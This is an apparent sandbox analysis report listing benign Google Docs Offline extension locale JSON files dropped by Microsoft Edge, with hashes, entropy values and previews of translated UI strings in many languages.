                                                                                                                                                                                                                                                                SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1763
                                                                                                                                                                                                                                                                Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):930
                                                                                                                                                                                                                                                                Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):913
                                                                                                                                                                                                                                                                Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):806
                                                                                                                                                                                                                                                                Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):883
                                                                                                                                                                                                                                                                Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1031
                                                                                                                                                                                                                                                                Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1613
                                                                                                                                                                                                                                                                Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                Encrypted:false
Malicious:false
Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):848
Entropy (8bit):4.494568170878587
Encrypted:false
Malicious:false
Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1425
Entropy (8bit):4.461560329690825
Encrypted:false
Malicious:false
Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):961
Entropy (8bit):4.537633413451255
Encrypted:false
Malicious:false
Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):959
Entropy (8bit):4.570019855018913
Encrypted:false
Malicious:false
Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):968
Entropy (8bit):4.633956349931516
Encrypted:false
Malicious:false
Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):838
Entropy (8bit):4.4975520913636595
Encrypted:false
Malicious:false
Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1305
Entropy (8bit):4.673517697192589
Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):911
                                                                                                                                                                                                                                                                Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):939
                                                                                                                                                                                                                                                                Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                                Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):972
                                                                                                                                                                                                                                                                Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                Encrypted:false
